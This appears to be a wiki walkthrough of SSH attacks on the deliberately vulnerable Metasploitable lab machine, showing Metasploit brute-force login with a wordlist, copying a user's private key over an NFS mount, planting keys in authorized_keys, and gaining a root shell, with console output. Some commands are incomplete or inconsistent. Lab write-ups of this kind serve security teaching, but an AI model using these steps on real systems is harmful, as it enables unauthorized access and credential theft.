From charlesreid1

SSH Service Info

First, a reminder of the information nmap returned about the SSH service after a port scan:

22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)

This server isn't using the 1.0 protocol, which is hopelessly broken and easy to defeat. This means getting past SSH will be (at least) mildly challenging.

Metasploit SSH Exploits

Two SSH attacks using metasploit:

  • ssh_login
  • ssh_login_pubkey

Metasploit ssh_login

The first attack is ssh_login, which allows you to use metasploit to brute-force guess SSH login credentials.

  • Module name is auxiliary/scanner/ssh/ssh_login


Metasploit ssh_login_pubkey

The second attack requires a private key. If you do gain access to the private SSH keys on a victim machine, you can attempt to authenticate with a large number of hosts and services using that private key.

  • Module name is auxiliary/scanner/ssh/ssh_login_pubkey


Brute Force ssh_login

We already covered how to brute force the login with Hydra, Metasploitable/SSH/Brute Force

Did you know you can also brute force an SSH login with Metasploitable? Use the auxiliary/scanner/ssh/ssh_login module.

Setting Up the Attack

We will use the module auxiliary/scanner/ssh/ssh_login:

msf > use auxiliary/scanner/ssh/ssh_login

Set this to run on the Metasploitable virtual box target:

msf auxiliary(ssh_login) > set RHOSTS
msf auxiliary(ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
USERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
msf auxiliary(ssh_login) > set VERBOSE false
VERBOSE => false

Running the Attack

Now run the attack:

msf auxiliary(ssh_login) > run

[*] - SSH - Starting buteforce
[*] Command shell session 1 opened (?? -> ??) at 2016-03-26 17:25:18 -0600
[+] - SSH - Success: 'msfadmin':'msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Wed Apr 10 12:02:00 UTC 2014 i686 GNU/Linux '
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) > 

Houston, We Have A Shell

At this point, we can create a session with the machine that we compromised. Logged in as user msfadmin:

msf auxiliary(ssh_login) > sessions -i 1
[*] Starting interaction with 1...

uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Wed Apr 10 12:02:00 UTC 2014 i686 GNU/Linux '

Private Key ssh_login_pubkey

If you manage to get your hands on the victim's private key, the auxiliary/scanner/ssh/ssh_login_pubkey module is for you!

This module uses the private key to do two things:

  • Get access to the victim machine
  • Get access to any machines that trust the victim's private key (must be listed in the SSH files of the victim machine)

Obtaining Private Key

To carry out this attack, you will need to have access to the file system, and/or be able to mount the remote file system (which, on Metasploitable, happens to be possible!): see Metasploitable/NFS

Once you've got access to the file system, you'll grab a copy of the remote machine's private keys, and use them together with Metasploit to obtain access to the machine.

(Note that you could also plant your keys on the target, by adding your public SSH keys onto the target machine's list of trusted machines, but this technique would restrict you to a particular machine, wile the Metasploit method is portable and less intrusive.)

To snatch the target's private key:

# service rpcbind start
# mkdir /tmp/target
# mount -t nfs /temp/target
# cp /tmp/target/home/msfadmin/.ssh/id_rsa /tmp/r00tprivatekey
# umount /tmp/target

Now you have a copy of the msfadmin account's private SSH key.

Metasploit We'll use Metasploit to turn this into access to the remote machine.

This key is also useful for impersonating the target when connecting to OTHER remote machines.

Planting Private Keys

An alternative method to gain access, although it is not useful for gaining access to any machines other than the victim machine, is to GENERATE a public/private SSH key pair from the attacker machine, and copy the PRIVATE key over to the remote machine. (Using the public key and the above-mentioned technique would be easier, but it's worth mentioning at least.)

To plant your private keys on the remote machine, you'll need write access to the target user's home directory. You'll generate a public SSH key from the attacker machine, the machine you want to have access WITH, and add it to the other machine's ~/.ssh/authorized_keys.

This presumes the .ssh directory exists. If it doesn't exist, you can make it, and tamper with the filesystem.

# service rpcbind start
# mkdir /tmp/target
# mount -t nfs /temp/target
# cd /tmp/target/home/msfadmin/ && mkdir .ssh/
# echo ~/.ssh/id_rsa >> /tmp/target/home/msfadmin/.ssh/authorized_keys
# umount /tmp/target

Setting Up the Attack

Here's info on the auxiliary/scanner/ssh/ssh_login_pubkey module in Metasploit, which will carry out the attack:

msf > use auxiliary/scanner/ssh/ssh_login_pubkey

Set some options, such as the private key file, the username to log in with, and the remote host:

msf auxiliary(ssh_login_pubkey) > set KEY_FILE /tmp/r00tprivatekey
KEY_FILE => /tmp/id_rsa
msf auxiliary(ssh_login_pubkey) > set USERNAME root
USERNAME => root
msf auxiliary(ssh_login_pubkey) > set RHOSTS
msf auxiliary(ssh_login_pubkey) > 

Running the Attack

Execute the attack, to use the remote machine's private key to gain access to the remote machine:

msf auxiliary(ssh_login_pubkey) > run

[*] SSH - Testing Cleartext Keys
[*] SSH - Testing 1 keys from /root/r00tmsfkey
[+] SSH - Success: 'root:-----BEGIN RSA PRIVATE KEY-----
' 'uid=0(root) gid=0(root) groups=0(root) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 1 opened ( -> at 2016-03-26 19:42:50 -0700
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login_pubkey) >

Success - we've got a session.

Getting a Shell

Now we can use the sessions command to utilize the information we just found and set up an interactive session.

msf auxiliary(ssh_login_pubkey) > sessions -i 1
[*] Starting interaction with 1...

uid=0(root) gid=0(root) groups=0(root)

uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux



We could create more mischief, by copying everyone else's private SSH keys and SSH connection histories, potentially giving us passwordless access to additional machines.

We could also get busy with post-exploit activities.